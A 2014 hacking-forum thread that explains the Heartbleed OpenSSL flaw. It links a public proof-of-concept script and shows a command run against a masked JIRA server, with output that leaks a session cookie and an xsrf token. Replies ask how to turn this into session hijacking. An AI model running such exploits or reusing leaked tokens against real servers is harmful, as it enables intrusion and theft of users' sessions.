Monday, July 28, 2014 Login · Register
    Login
Username

Password


Remember Me

Not a member yet?
Click here to register.

Forgotten your password?
Request a new one here.

 

    Users Online
  • · Members on IRC: 32   
  • · Total Members: 15,644
  • · Newest Member: Adorapuff
  •  

     

        Related Ads
     

     

     

        Top 10 Forum Posters
    UserPosts
    bluechill1411   
    madf0x1285   
    cruizrisner1061   
    Qwexotic1034   
    Null Set870   
    Override604   
    auditorsec603   
    godofcereal599   
    TurboBorland585   
    Teddy477   
     

        Affiliates




  • iExploit


  • iExploit


  • WeChall





  • Thisislegal.com

  •  

        Related Ads
     

    View Thread
         
    Security Override Ľ Hacking Ľ Website Hacking
    heartbleed.py exploit example
    Register FAQ Members List Today's Posts Search

    Print Thread
    04-14-2014 01:26 AM heartbleed.py exploit example
    The Heartbleed issue is actually worse than it might immediately seem (and it seems pretty bad already).

    In case youíve been out of the loop, Heartbleed (CVE-2014-0160) is a vulnerability in OpenSSL that allows any remote user to dump some of the contents of the serverís memory. And yes, thatís really bad. The major concern is that a skilled user could craft an exploit that could dump the RSA private key that the server is using to communicate with its clients. The level of knowledge / skill required to craft this attack isnít particularly high, but likely out of reach for the average script kiddie user.

    So why is Heartbleed worse than you think? Itís simple: the currently-available proof-of-concept scripts allow any client, anywhere in the world, to perform a session hijacking attack of a logged in user.

    As of this morning, the most widely-shared proof-of-concept is this simple Python script: https://gist.github.com/takeshixx/10107280. With this script, anyone in the world can dump a bit of RAM from a vulnerable server.

    Letís have a look at the output of this utility against a vulnerable server running the JIRA ticket tracking system. The hex output has been removed to improve readability.

    [matt@laptop ~]# python heartbleed.py jira.XXXXXXXXXXX.com
    Connecting...
    Sending Client Hello...
    Waiting for Server Hello...
    ... received message: type = 22, ver = 0302, length = 66
    ... received message: type = 22, ver = 0302, length = 3239
    ... received message: type = 22, ver = 0302, length = 331
    ... received message: type = 22, ver = 0302, length = 4
    Sending heartbeat request...
    ... received message: type = 24, ver = 0302, length = 16384
    Received heartbeat response:
    .@..GET /browse/
    en_US-cubysj-198
    8229788/6160/11/
    (lots of garbage)
    ..............Ac
    cept-Encoding: g
    zip,deflate,sdch
    ..Accept-Languag
    e: en-US,en;q=0.
    8..Cookie: atlas
    sian.xsrf.token=
    BWEK-0C0G-BSN7-V
    OZ1|3d6d84686dc0
    f214d0df1779cbe9
    4db6047b0ae5|lou
    t; JSESSIONID=33
    F4094F68826284D1
    8AA6D7ED1D554E..
    ..E.$3Z.l8.M..e5
    ..6D7ED1D554E...
    ......*..?.e.b..
    WARNING: server returned more data than it should - server is vulnerable!
     
    Offline
    04-14-2014 11:27 PM RE: heartbleed.py exploit example
    the gist.github link doesn't work however.
     
    Offline
    04-19-2014 03:14 PM RE: heartbleed.py exploit example
    script is uploaded by override! in code section name heartbleed.py
     
    Offline
    04-20-2014 04:29 PM RE: heartbleed.py exploit example
    Could you elaborate on how to session hijack with heartbleed?
     
    Offline
    04-20-2014 04:29 PM RE: heartbleed.py exploit example
    Not server hijacking. I meant using heartbleed and the information you get from it to perform a session hijack to a user somewhere in the world.
     
    Offline
    Jump to Forum:
    Forum powered by fusionBoard